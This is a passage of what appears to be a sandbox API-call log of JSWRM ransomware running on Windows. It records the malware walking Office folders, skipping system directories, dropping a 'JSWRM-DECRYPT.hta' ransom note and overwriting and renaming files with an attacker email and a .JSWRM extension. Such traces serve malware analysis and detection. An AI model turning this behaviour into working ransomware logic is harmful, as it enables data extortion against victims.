ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47fdb156, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0136.443] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.443] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47fdb156, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.443] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.443] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.443] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47fdb156, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47fdb156, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47fdb156, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.444] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.444] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.444] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.444] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.444] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.444] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.444] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.444] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.444] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.444] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.444] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.444] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.444] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.444] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.444] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.444] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.444] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.444] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.444] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.444] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.444] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hi\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hi\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.445] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21144) returned 1 [0136.445] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.445] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5290, lpOverlapped=0x0) returned 1 [0136.448] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.448] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5290, lpOverlapped=0x0) returned 1 [0136.448] CloseHandle (hObject=0x314) returned 1 [0136.448] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hi\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hi\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hi\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hi\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.449] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.449] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0136.449] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf480feb5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf480feb5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="hr", cAlternateFileName="")) returned 1 [0136.449] lstrcmpiW (lpString1="hr", lpString2=".") returned 1 [0136.449] lstrcmpiW (lpString1="hr", lpString2="..") returned 1 [0136.450] lstrcmpiW (lpString1="hr", lpString2="...") returned 1 [0136.450] lstrcmpiW (lpString1="hr", lpString2="windows") returned -1 [0136.450] lstrcmpiW (lpString1="hr", lpString2="recovery") returned -1 [0136.450] lstrcmpiW (lpString1="hr", lpString2="perflogs") returned -1 [0136.450] lstrcmpiW (lpString1="hr", lpString2="documents and settings") returned 1 [0136.450] lstrcmpiW (lpString1="hr", lpString2="$RECYCLE.BIN") returned 1 [0136.450] lstrcmpiW (lpString1="hr", lpString2="system volume information") returned -1 [0136.450] lstrcmpiW (lpString1="hr", lpString2="msocache") returned -1 [0136.450] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hr\\jswrm-decrypt.hta")) returned 0xffffffff [0136.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.451] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.452] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.452] CloseHandle (hObject=0x238) returned 1 [0136.453] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hr\\jswrm-decrypt.hta")) returned 0x20 [0136.453] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hr\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf480feb5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47fdb156, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x232180 [0136.453] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.453] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf480feb5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47fdb156, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.453] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.453] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.453] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47fdb156, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47fdb156, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47fdb156, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.453] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.453] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.453] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.453] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.453] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.453] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.453] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.453] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.453] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.453] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.453] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf480feb5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf480feb5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.454] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.454] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.454] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.454] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.454] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.454] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.454] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.454] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.454] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.454] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hr\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hr\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.455] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21144) returned 1 [0136.455] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.455] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5290, lpOverlapped=0x0) returned 1 [0136.462] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.462] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5290, lpOverlapped=0x0) returned 1 [0136.463] CloseHandle (hObject=0x314) returned 1 [0136.463] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hr\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hr\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hr\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hr\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.464] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf480feb5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf480feb5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.464] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0136.464] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4646280, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4646280, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="hu", cAlternateFileName="")) returned 1 [0136.464] lstrcmpiW (lpString1="hu", lpString2=".") returned 1 [0136.464] lstrcmpiW (lpString1="hu", lpString2="..") returned 1 [0136.464] lstrcmpiW (lpString1="hu", lpString2="...") returned 1 [0136.464] lstrcmpiW (lpString1="hu", lpString2="windows") returned -1 [0136.464] lstrcmpiW (lpString1="hu", lpString2="recovery") returned -1 [0136.464] lstrcmpiW (lpString1="hu", lpString2="perflogs") returned -1 [0136.464] lstrcmpiW (lpString1="hu", lpString2="documents and settings") returned 1 [0136.464] lstrcmpiW (lpString1="hu", lpString2="$RECYCLE.BIN") returned 1 [0136.464] lstrcmpiW (lpString1="hu", lpString2="system volume information") returned -1 [0136.464] lstrcmpiW (lpString1="hu", lpString2="msocache") returned -1 [0136.464] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hu\\jswrm-decrypt.hta")) returned 0xffffffff [0136.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hu\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.465] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.465] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.466] CloseHandle (hObject=0x238) returned 1 [0136.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hu\\jswrm-decrypt.hta")) returned 0x20 [0136.467] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hu\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4646280, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4646280, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4800111c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0136.467] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.467] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4646280, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4646280, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4800111c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, 